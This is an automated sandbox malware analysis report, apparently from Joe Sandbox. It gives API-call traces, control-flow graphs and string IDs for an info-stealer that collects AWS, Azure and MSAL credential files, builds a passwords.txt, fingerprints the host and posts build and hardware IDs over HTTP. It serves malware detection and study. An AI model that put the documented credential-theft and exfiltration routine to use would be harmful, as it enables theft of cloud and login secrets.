                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009285D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0092862D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00928634
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009286D2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 009286EB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009286F5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095719C), ref: 00928701
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 0092870B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A0), ref: 00928717
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00928724
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 0092872E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A4), ref: 0092873A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00928747
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00928751
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A8), ref: 0092875D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 0092876A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00928774
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571AC), ref: 00928780
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571B0), ref: 0092878C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009287C5
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00928812
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                              • API String ID: 1956182324-347816968
                                                                                                                                                                                                              • Opcode ID: 9f56d350d0325ec6f31a3aecbf899052f9ab828ea27e3618222ef99620327862
                                                                                                                                                                                                              • Instruction ID: 4bbc43a2738c755d9f42fe239aa282b4a0ae8035d052181c2d8c23c9f0963871
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f56d350d0325ec6f31a3aecbf899052f9ab828ea27e3618222ef99620327862
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7812836900218BBCF02BBA0FD4AADE7BB5AF88301F514050FA19B3165DF359E958B95

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 2310 921666-92169e GetTempPathW 2311 9216a4-9216cb wsprintfW 2310->2311 2312 921809-92180b 2310->2312 2314 9216d0-9216f5 CreateFileW 2311->2314 2313 9217fa-921808 call 93d1a8 2312->2313 2314->2312 2316 9216fb-92174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 943da0 WriteFile 2314->2316 2316->2312 2320 921754-92175a 2316->2320 2320->2312 2321 921760-92179c call 943da0 CloseHandle CreateFileW 2320->2321 2321->2312 2324 92179e-9217b1 ReadFile 2321->2324 2324->2312 2325 9217b3-9217b9 2324->2325 2325->2312 2326 9217bb-9217f1 call 943da0 GetProcessHeap RtlFreeHeap CloseHandle 2325->2326 2326->2314 2329 9217f7-9217f9 2326->2329 2329->2313
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00921696
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 009216BC
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 009216E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 009216FE
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00921705
                                                                                                                                                                                                              • _time64.MSVCRT ref: 0092170E
                                                                                                                                                                                                              • srand.MSVCRT ref: 00921715
                                                                                                                                                                                                              • rand.MSVCRT ref: 0092171E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092172E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00921746
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00921763
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00921771
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0092178D
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 009217A9
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009217BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009217C8
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 009217CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009217DB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                              • String ID: %s%s$delays.tmp
                                                                                                                                                                                                              • API String ID: 1620473967-1413376734
                                                                                                                                                                                                              • Opcode ID: 8002fbb36e137a5b8745a520db8c02df336cce6a328b37cca09c9d521b36a37f
                                                                                                                                                                                                              • Instruction ID: ef484df94de598fd6cf76ef7efdf5575b8fbe90f054755f62d377a65ae620498
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8002fbb36e137a5b8745a520db8c02df336cce6a328b37cca09c9d521b36a37f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741A3B1D11318ABDB209F72AC4DFAF7B7DEBD5722F0005A9B00AD10A1DA314964DF60

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 2330 924b2e-924bf3 call 9304ee call 924ab6 call 9304bc * 5 InternetOpenA StrCmpCA 2345 924bf5 2330->2345 2346 924bfb-924c01 2330->2346 2345->2346 2347 924c07-924d91 call 931c1f call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 93059c call 930562 call 922920 * 2 InternetConnectA 2346->2347 2348 925194-925236 InternetCloseHandle call 922920 * 8 call 93d1a8 2346->2348 2347->2348 2417 924d97-924dd1 HttpOpenRequestA 2347->2417 2418 924dd7-924ddd 2417->2418 2419 925188-92518e InternetCloseHandle 2417->2419 2420 924dfb-92511a call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9304bc call 93059c * 2 call 930562 call 922920 * 2 lstrlenA * 2 HttpSendRequestA 2418->2420 2421 924ddf-924df5 InternetSetOptionA 2418->2421 2419->2348 2524 92515c-925174 InternetReadFile 2420->2524 2421->2420 2525 925176-925183 InternetCloseHandle call 922920 2524->2525 2526 92511c-925124 2524->2526 2525->2419 2526->2525 2528 925126-925157 call 9305de call 930562 call 922920 2526->2528 2528->2524
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00924BCD
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00924BEB
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924D83
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00924DC7
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00924DF5
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00956947,",build_id,009577BC,------,009577B0,",hwid,0095779C,------), ref: 009250EE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925101
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0092510F
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092516C
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00925177
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0092518E
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0092519A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                              • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                              • API String ID: 3006978581-3960666492
                                                                                                                                                                                                              • Opcode ID: 8dde77cf60def045897e61163cd8f7f8e3471e0e03b8dc670e48c06da1d62122
                                                                                                                                                                                                              • Instruction ID: 550b23564d7980ea42677a65b01a83aac03929cd7054b1e238de19b8c53c207b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dde77cf60def045897e61163cd8f7f8e3471e0e03b8dc670e48c06da1d62122
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87027F3195512A9BCB21EB21DD52BDDB7B4FF88704F0581E1A58C77126CA74BE8A8FC0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009317E3
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,0000004C,00933F39,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 009317F4
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931805
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 0093181F
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00931855
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 009318B0
                                                                                                                                                                                                                • Part of subcall function 0093172C: __EH_prolog3_catch.LIBCMT ref: 00931733
                                                                                                                                                                                                                • Part of subcall function 0093172C: CoCreateInstance.OLE32(009531B0,00000000,00000001,0095B008,?,00000018,009318D6,?), ref: 00931756
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysAllocString.OLEAUT32(?), ref: 00931763
                                                                                                                                                                                                                • Part of subcall function 0093172C: _wtoi64.MSVCRT ref: 00931796
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysFreeString.OLEAUT32(?), ref: 009317AF
                                                                                                                                                                                                                • Part of subcall function 0093172C: SysFreeString.OLEAUT32(00000000), ref: 009317B6
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 009318DF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009318EB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009318F2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00931931
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093191E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                              • API String ID: 2280294774-461178377
                                                                                                                                                                                                              • Opcode ID: a7c03c6bccf3f4434c161c24df14ae52a67109bb47d56623921b691368e9cdad
                                                                                                                                                                                                              • Instruction ID: d402f0c091317aa4c1ef5f5cb8f8899c0d16ff408780ace1feef52ac953a71ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c03c6bccf3f4434c161c24df14ae52a67109bb47d56623921b691368e9cdad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16414B71900209BBDB10DBD6EC89EEFBBBDEFC9B12F104109FA11A71A0D6749945DB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936524
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00936543
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 00936560
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936598
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 009365BA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 009365D7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0093660C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0093662E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0093664B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00936680
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                              • API String ID: 780282842-974132213
                                                                                                                                                                                                              • Opcode ID: 1cea680ef1f4f1c60589307a6c8d8d82eaf1430a3907923e81f349e725ad20d4
                                                                                                                                                                                                              • Instruction ID: 343487225bceb242ad313f077312f262ab0d0080b6b299fa32b23a5a402ac258
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cea680ef1f4f1c60589307a6c8d8d82eaf1430a3907923e81f349e725ad20d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41B175D4021C6ADB25FB60EC47FED736CAF89314F4444D5BA18E3091DAB0AA888F51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092AC5F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092AD69
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0092AD70
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009573D4,00000000), ref: 0092AE21
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009573D8), ref: 0092AE49
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE6D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573DC), ref: 0092AE79
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE83
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E0), ref: 0092AE8F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AE99
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E4), ref: 0092AEA5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEAF
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573E8), ref: 0092AEBB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEC5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573EC), ref: 0092AED1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEDB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573F0), ref: 0092AEE7
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 0092AEF1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573F4), ref: 0092AEFD
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092AF4F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092AF6A
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092AFAD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1956182324-0
                                                                                                                                                                                                              • Opcode ID: 2349d313cf734c82f074f9a643cdfad694f76c2a9e5e0fb7cd5fd4ac7b9e5c6a
                                                                                                                                                                                                              • Instruction ID: 218da93f570081c48a6f6624b922cddafc08e8449a1536ed8e2e3c99e9f7c895
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2349d313cf734c82f074f9a643cdfad694f76c2a9e5e0fb7cd5fd4ac7b9e5c6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82C11932904118ABDF06BBA0FD4AADDBB74EF88705F114065F905B7066DF31AE869F50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                                • Part of subcall function 00930C28: HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0093871B), ref: 00937269
                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00937278
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,009566D6), ref: 00937796
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00937857
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00937870
                                                                                                                                                                                                                • Part of subcall function 00924B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00924BCD
                                                                                                                                                                                                                • Part of subcall function 00924B2E: StrCmpCA.SHLWAPI(?), ref: 00924BEB
                                                                                                                                                                                                                • Part of subcall function 00933A02: StrCmpCA.SHLWAPI(?,block,?,?,009378D0), ref: 00933A17
                                                                                                                                                                                                                • Part of subcall function 00933A02: ExitProcess.KERNEL32 ref: 00933A22
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00925FD8
                                                                                                                                                                                                                • Part of subcall function 00925F39: StrCmpCA.SHLWAPI(?), ref: 00925FF6
                                                                                                                                                                                                                • Part of subcall function 009331D8: strtok_s.MSVCRT ref: 009331F7
                                                                                                                                                                                                                • Part of subcall function 009331D8: strtok_s.MSVCRT ref: 0093327A
